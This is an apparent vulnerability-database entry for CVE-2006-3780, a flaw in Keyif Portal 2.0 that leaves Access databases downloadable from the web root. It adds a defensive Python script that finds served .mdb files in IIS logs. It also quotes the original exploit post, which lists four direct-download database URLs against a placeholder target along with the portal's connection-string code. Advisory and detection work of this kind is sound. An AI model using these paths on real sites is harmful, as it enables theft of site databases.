Keyifweb Keyif Portal web root information disclosure vulnerability

Vulnerability ID: 1194032    Vulnerability type: Unknown
Published: 2006-07-24    Updated: 2006-07-24
CVE ID: CVE-2006-3780    CNNVD ID: CNNVD-200607-388
Platform: N/A    CVSS score: 5.0
|Sources
https://www.securityfocus.com/bid/82443
https://cxsecurity.com/issue/WLB-2006070115
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-388
|Vulnerability details
Keyifweb Keyif Portal 2.0 stores sensitive information under the web root without adequate access control. A remote attacker can download the application's databases by directly requesting (1) ANKET/anket.mdb, (2) HABER/keyifweb.mdb, (3) ASP/download.mdb, or (4) SAYAC/aktif.mdb in the database/A9S7G6ASD790 directory.
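As an added illustration (not part of the advisory or the CNNVD record), the following Python reads IIS W3C extended log rows, constructed here as sample data, and flags every successful response to a request for an Access database file, which is exactly the direct-download behaviour described above; rows answered with 403 or 404 are not reported because the request was blocked or the file was not there.

```python
import re

# Database file types that an ASP/Access site should never serve directly.
DB_EXTENSIONS = (".mdb", ".ldb", ".accdb")

# Constructed sample IIS W3C log; the #Fields directive names the columns.
# Paths mirror the ones in the vulnerability description; IPs are documentation ranges.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2006-07-16 10:01:02 10.0.0.5 GET /portal/default.asp - 80 - 192.0.2.10 Mozilla/4.0 200 0 0 31
2006-07-16 10:01:09 10.0.0.5 GET /portal/database/A9S7G6ASD790/ANKET/anket.mdb - 80 - 192.0.2.10 Mozilla/4.0 200 0 0 812
2006-07-16 10:01:11 10.0.0.5 GET /portal/database/A9S7G6ASD790/HABER/keyifweb.mdb - 80 - 192.0.2.10 Mozilla/4.0 206 0 0 640
2006-07-16 10:01:15 10.0.0.5 GET /portal/database/A9S7G6ASD790/SAYAC/aktif.mdb - 80 - 192.0.2.10 Mozilla/4.0 404 0 2 5
2006-07-16 10:01:20 10.0.0.5 GET /portal/database/A9S7G6ASD790/ASP/download.mdb - 80 - 192.0.2.11 Mozilla/4.0 403 0 0 4
"""


def parse_w3c(log_text):
    """Yield one dict per W3C log record, taking column names from the #Fields line."""
    fields = None
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # skip malformed rows rather than misalign columns
        yield dict(zip(fields, parts))


def find_db_downloads(log_text):
    """Return (client ip, uri, status) for each 2xx response to a request whose
    path ends in a database file extension, i.e. a database that was actually
    served. 403/404 rows mean the request was blocked or the file is absent."""
    hits = []
    for rec in parse_w3c(log_text):
        uri = rec["cs-uri-stem"]
        status = int(rec["sc-status"])
        if uri.lower().endswith(DB_EXTENSIONS) and 200 <= status < 300:
            hits.append((rec["c-ip"], uri, status))
    return hits


if __name__ == "__main__":
    for ip, uri, status in find_db_downloads(SAMPLE_LOG):
        print(f"database served: {uri} -> {ip} (HTTP {status})")
```

Any hit means the file is reachable from the web root and should be moved outside it or denied through IIS request filtering.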
|Exploit (EXP)
title : Keyif Portal v2.0 - Microsoft Access Driver ( MDB ) Download
-
script site : http://www.keyifweb.com/
-
Discovered : xoron
-
Cont@ct    : x0r0n (at) hotmail (dot) com [email concealed]
-
Exploit    : http://www.target.com/[path]/A9S7G6ASD790/ANKET/anket.mdb
             http://www.target.com/[path]/A9S7G6ASD790/HABER/keyifweb.mdb
             http://www.target.com/[path]/A9S7G6ASD790/ASP/download.mdb
             http://www.target.com/[path]/A9S7G6ASD790/SAYAC/aktif.mdb
-
Code:

SAYAC
Veri_yolu = Server.MapPath("database/A9S7G6ASD790/SAYAC/aktif.mdb")
Bcumle = "DRIVER={Microsoft Access Driver (*.mdb)};DBQ=" & Veri_yolu
-----
ASP
Sur.Open "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" & Server.MapPath("database/A9S7G6ASD790/ASP/download.mdb")
-----
ANKET
vt_yol = server.mappath("database/A9S7G6ASD790/ANKET/anket.mdb")
Set bag = CreateObject("ADODB.Connection")
-----
DOWNLOAD
Set Sur = Server.CreateObject("ADODB.Connection")
Sur.Open "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" & Server.MapPath("database/A9S7G6ASD790/ASP/download.mdb")
-
XORON - Cyber-Warrior.Org /// special thanx R3D4C!D :)
|Affected products
Keyifweb Keyif Portal 2.0
|References
Source: BUGTRAQ
Name: 20060716 Keyif Portal v2.0 - Microsoft Access Driver (MDB) Download
Link: http://www.securityfocus.com/archive/1/archive/1/440415/100/0/threaded
Source: SREASON
Name: 1278
Link: http://securityreason.com/securityalert/1278